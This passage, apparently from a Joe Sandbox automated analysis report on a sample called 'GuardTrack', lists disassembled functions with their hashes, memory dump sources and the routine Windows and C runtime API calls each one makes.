                                                          • Instruction ID: 84fc842e2509700bf8002d24747573afc13dcbb71f54dbea9b63d189eb672eca
                                                          • Opcode Fuzzy Hash: 4e1ff084c8d397420e0fea8673c45fbe7a36062e4c78b7c0b623e6e72541cea8
                                                          • Instruction Fuzzy Hash: 12913935A00915DFCB28DF18D5859A9BBE6FF89310B55806AE84A8F362DB31FD41CF81
                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE ref: 005D0ED5
                                                          • SetErrorMode.KERNELBASE ref: 005D0EE7
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseErrorFindModeNotification
                                                          • String ID:
                                                          • API String ID: 1298299968-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: 34d67767b1980b2ed08beb8965ec67a084d62ca517d75d92b758adcc88dd88b7
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: D931B871A001099BD728DF5DC480A69FBA9FF59310F649A97E409CB391D731EDC1CB80
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 005C5FEF
                                                            • Part of subcall function 005D359C: __lock.LIBCMT ref: 005D35A2
                                                            • Part of subcall function 005D359C: DecodePointer.KERNEL32(00000001,?,005C6004,00608892), ref: 005D35AE
                                                            • Part of subcall function 005D359C: EncodePointer.KERNEL32(?,?,005C6004,00608892), ref: 005D35B9
                                                            • Part of subcall function 005C5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 005C5F18
                                                            • Part of subcall function 005C5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005C5F2D
                                                            • Part of subcall function 005C5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005C526C
                                                            • Part of subcall function 005C5240: IsDebuggerPresent.KERNEL32 ref: 005C527E
                                                            • Part of subcall function 005C5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005C52E6
                                                            • Part of subcall function 005C5240: SetCurrentDirectoryW.KERNEL32(?), ref: 005C5366
                                                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 005C602F
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                          • String ID:
                                                          • API String ID: 1438897964-0
                                                          • Opcode ID: 8fc329e26877c8056d9e0f7c76d754d0654a25ecc90fa2eac7bae15f3d6d829a
                                                          • Instruction ID: 9fab748ad740c49b08e43a462c0a8c18ba000beb0d859c96f1ef98a5176bc0d4
                                                          • Opcode Fuzzy Hash: 8fc329e26877c8056d9e0f7c76d754d0654a25ecc90fa2eac7bae15f3d6d829a
                                                          • Instruction Fuzzy Hash: 47114F715083029FC714DF69EC4994ABFE9FB94710F00491EF55897272DB70A684CB92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __lock_file_memset
                                                          • String ID:
                                                          • API String ID: 26237723-0
                                                          • Opcode ID: ad4b144dadac498473f1e98cf30023e1ff22bf4bcb6e09883afa8e9181b86e4b
                                                          • Instruction ID: 5b50b45d9895c272ecff0f29f192511dd82ec930639d4161224e6415ed13f71d
                                                          • Opcode Fuzzy Hash: ad4b144dadac498473f1e98cf30023e1ff22bf4bcb6e09883afa8e9181b86e4b
                                                          • Instruction Fuzzy Hash: CA01257180064AEBCF31AF6D8C0999E7F61BFC0360F244117B824563A1E7318611EB51
                                                          APIs
                                                            • Part of subcall function 005D8D58: __getptd_noexit.LIBCMT ref: 005D8D58
                                                          • __lock_file.LIBCMT ref: 005D560B
                                                            • Part of subcall function 005D6E3E: __lock.LIBCMT ref: 005D6E61
                                                          • __fclose_nolock.LIBCMT ref: 005D5616
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: 0af8c6e55eb2fa0fe2cc861a519fb598b02c3a740f8177792404481c206e1831
                                                          • Instruction ID: 2fc0da419d7faf37fd537c5ecdd27fc8b3f413d846da357a170d2eb3c72fb343
                                                          • Opcode Fuzzy Hash: 0af8c6e55eb2fa0fe2cc861a519fb598b02c3a740f8177792404481c206e1831
                                                          • Instruction Fuzzy Hash: 09F09671801B069AD7316B6D980976E6F917F81335F154107B464AB3C1DB7C89419B51
                                                          APIs
                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000014,00000FA0,00000001,00000000,?,0061710A,00000000,00000000,005F2F49), ref: 00616FFF
                                                          • InterlockedExchange.KERNEL32(00000034,00000000), ref: 00617021
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                          • String ID:
                                                          • API String ID: 4104817828-0
                                                          • Opcode ID: a8b6a58d21f390e7045704bedd0c12b9a8a9e3a09f14a01d2ec899cf4fc62aa4
                                                          • Instruction ID: 570c59a281d7625c5780a5a74beddff5ea735b4749ab9a65c908ef16e402461b
                                                          • Opcode Fuzzy Hash: a8b6a58d21f390e7045704bedd0c12b9a8a9e3a09f14a01d2ec899cf4fc62aa4
                                                          • Instruction Fuzzy Hash: DAF034B11007159FD3209F56D9488A7FBFDEF85710B00882EE98A87A10C7B4A545CB61
                                                          APIs
                                                          • __lock_file.LIBCMT ref: 005D5EB4
                                                          • __ftell_nolock.LIBCMT ref: 005D5EBF
                                                            • Part of subcall function 005D8D58: __getptd_noexit.LIBCMT ref: 005D8D58
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2999321469-0
                                                          • Opcode ID: e34dcaf4aed99f3d8b9bd3a0831809dfeb048eca1461e9211e08c76519f3bd3e
                                                          • Instruction ID: 087c2f9cab2dfee2357bb35a14852304face6337504856a688ba1c23b778665d
                                                          • Opcode Fuzzy Hash: e34dcaf4aed99f3d8b9bd3a0831809dfeb048eca1461e9211e08c76519f3bd3e
                                                          • Instruction Fuzzy Hash: 5BF0A731911A179AD730BB7C880A76E7F94BF81332F214247B020AB3C2DF784A029B51
                                                          APIs
                                                          • _memset.LIBCMT ref: 005C5AEF
                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 005C5B1F
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell__memset
                                                          • String ID:
                                                          • API String ID: 928536360-0
                                                          • Opcode ID: c013c478d55308f666e3529c539adfa32bd4ef76cedaeb5c80ec32eb5e3baf7d
                                                          • Instruction ID: fbc99f49941d3bfe2e23412ba79c98031073f7439256658bfd98e7041bfc063f
                                                          • Opcode Fuzzy Hash: c013c478d55308f666e3529c539adfa32bd4ef76cedaeb5c80ec32eb5e3baf7d
                                                          • Instruction Fuzzy Hash: ACF0A7708183189FD7A28B64DC497957BBCA70130CF0001EAAA5C96293DB710BC8CF51
                                                          APIs
                                                          • ___crtCorExitProcess.LIBCMT ref: 005D32D5
                                                            • Part of subcall function 005D329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,005D32DA,005D1003,?,005D9EEE,000000FF,0000001E,0066CE28,00000008,005D9E52,005D1003,005D1003), ref: 005D32AA
                                                            • Part of subcall function 005D329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 005D32BC
                                                          • ExitProcess.KERNEL32 ref: 005D32DE
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                          • String ID:
                                                          • API String ID: 2427264223-0
                                                          • Opcode ID: ad086d38d3e4e4a0991b7a8092c8738003ff0206a580e28dcf4954a8c215092a
                                                          • Instruction ID: 15f66348be66cfe3323a79ac096b36ea10f53396e5e98781cad54c2117dd7514
                                                          • Opcode Fuzzy Hash: ad086d38d3e4e4a0991b7a8092c8738003ff0206a580e28dcf4954a8c215092a
                                                          • Instruction Fuzzy Hash: 97B09234000209BBDB122F15DC0E8483F2AFB01B90B405022F90408131EBB2AA929A91
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: LoadString$__swprintf
                                                          • String ID:
                                                          • API String ID: 207118244-0
                                                          • Opcode ID: 24166baab50d18c4610ba3f97159a87778ece8f8f2565281757f00af9bf92824
                                                          • Instruction ID: 3b65b99b999bf9768923103c721754d719c8b00cc56bbf107253d7e479068cd8
                                                          • Opcode Fuzzy Hash: 24166baab50d18c4610ba3f97159a87778ece8f8f2565281757f00af9bf92824
                                                          • Instruction Fuzzy Hash: ADB15D34A0011ADFCB14EF94D855DEEBBB6FF48720F24801AF915A7291EB70A952CF90
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: a2d2e1b4ad566a7b6937ba8608abb50d3ef21dbd7962695651874e6599f7997b
                                                          • Instruction ID: 2325e8eb1c6481131e2bb2cacef3e4179a18264afad8ac82f088452ddc08fb4f
                                                          • Opcode Fuzzy Hash: a2d2e1b4ad566a7b6937ba8608abb50d3ef21dbd7962695651874e6599f7997b
                                                          • Instruction Fuzzy Hash: 8441F774504351DFDB24DF19C448B5ABBE1BF85304F0988ACE8899B362C336F845CB52
                                                          APIs
                                                            • Part of subcall function 005C4B29: FreeLibrary.KERNEL32(00000000,?), ref: 005C4B63
                                                            • Part of subcall function 005D547B: __wfsopen.LIBCMT ref: 005D5486
                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,005C27AF,?,00000001), ref: 005C49F4
                                                            • Part of subcall function 005C4ADE: FreeLibrary.KERNEL32(00000000), ref: 005C4B18
                                                            • Part of subcall function 005C48B0: _memmove.LIBCMT ref: 005C48FA
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                          • String ID:
                                                          • API String ID: 1396898556-0
                                                          • Opcode ID: 95b2d77ab9130d479d9badb4643690c5b9d82e1c2f8fabe0d438fdb3ce20a1f3
                                                          • Instruction ID: 3c3d82ff1aa38ac2db7708a13dcac8754d62017ee5a909c39298df30582d5bff
                                                          • Opcode Fuzzy Hash: 95b2d77ab9130d479d9badb4643690c5b9d82e1c2f8fabe0d438fdb3ce20a1f3
                                                          • Instruction Fuzzy Hash: 0811C831650206AFDF24FBB08C2AFAE7BA6AF84701F10841DF545A61C1EA749A51AB94
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: dae69bbb1c959e3e3b1e6ffe7f7f51c22e79ec1d6cb0bde832dd062138629da2
                                                          • Instruction ID: 9e602c116818b6a14f381e00985be433d0a1dcea87b2dca428847aa393a19da6
                                                          • Opcode Fuzzy Hash: dae69bbb1c959e3e3b1e6ffe7f7f51c22e79ec1d6cb0bde832dd062138629da2
                                                          • Instruction Fuzzy Hash: 3F210FB8508341DFEB28DF54C448B5ABBE1BF84304F098968F98A57322D735F849CB92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 76d5dfd19126f7aba3bb295fb5ed34499109e4abbdc830f683e47744b2f34f36
                                                          • Instruction ID: 5edd89a9af393a63e423a773c3ab7cf4f781e11d22d5afb45b19a63ec767d739
                                                          • Opcode Fuzzy Hash: 76d5dfd19126f7aba3bb295fb5ed34499109e4abbdc830f683e47744b2f34f36
                                                          • Instruction Fuzzy Hash: B701A772201B026ED7245B79DC06F67BF98FB45790F10852FF51ACA2D1EA31E4408B94
                                                          APIs
                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00624998
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: EnvironmentVariable
                                                          • String ID:
                                                          • API String ID: 1431749950-0
                                                          • Opcode ID: 6531743494fca07e043a3e44c55154a41a04da1dfb6d33ab87b26a7399acbaaa
                                                          • Instruction ID: 2cbbcd84c4958204934e9bb8ed22d5a7655a7a8875d803775675efbc90b335b9
                                                          • Opcode Fuzzy Hash: 6531743494fca07e043a3e44c55154a41a04da1dfb6d33ab87b26a7399acbaaa
                                                          • Instruction Fuzzy Hash: AAF03135608105BF9B24FB65D84AD9F7BBDEF85720B00405AF9059B391DE70BD81CB54
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _fseek
                                                          • String ID:
                                                          • API String ID: 2937370855-0
                                                          • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                          • Instruction ID: d9a97c69dc8a8c9d4efe208c0da0de1a8839ee3c1bf0d1e8763963df6f426b3b
                                                          • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                          • Instruction Fuzzy Hash: 5CF085B6400208BFDF148F84DC04DEBBF7AEB89720F00459DF9045A210D232EA218BA0
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,?,005C27AF,?,00000001), ref: 005C4A63
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 8d4c5f61be68b8d0e6c900dc5bd51ee7801c1986466a4b3db80cb788bc36c805
                                                          • Instruction ID: 2b6272b38d862681e340bcc7845221732de9753e213a7081ba6cd32532c7d15b
                                                          • Opcode Fuzzy Hash: 8d4c5f61be68b8d0e6c900dc5bd51ee7801c1986466a4b3db80cb788bc36c805
                                                          • Instruction Fuzzy Hash: 7DF0F271145712CFCB349FA4E8A4E26BFF2FB14325320A92EE5A683610C7319984DF44
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock
                                                          • String ID:
                                                          • API String ID: 2638373210-0
                                                          • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                          • Instruction ID: 50df58fa2028ce90ecc74e7af042b10c8734511a63789ce543d8b2032cef1bc6
                                                          • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                          • Instruction Fuzzy Hash: DAF0F87240020DFFDF05CF94C945EAABB79FB14314F208589F9198A252D336DA61AB91
                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005D09E4
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_memmove
                                                          • String ID:
                                                          • API String ID: 2514874351-0
                                                          • Opcode ID: 3c88a0200bfd6c451bbee5f8a9ca473cf663b4358a9aa75fb20206394617a607
                                                          • Instruction ID: be47805c09a9cdcda2733e18f173b00c4790c31566b79f4a1e29a76e1bce2e1c
                                                          • Opcode Fuzzy Hash: 3c88a0200bfd6c451bbee5f8a9ca473cf663b4358a9aa75fb20206394617a607
                                                          • Instruction Fuzzy Hash: 5CE086369041295BC72196989C09FEE7BDDEBCA691F0402B6FD08D7204D9709C8186D5
                                                          APIs
                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00614D31
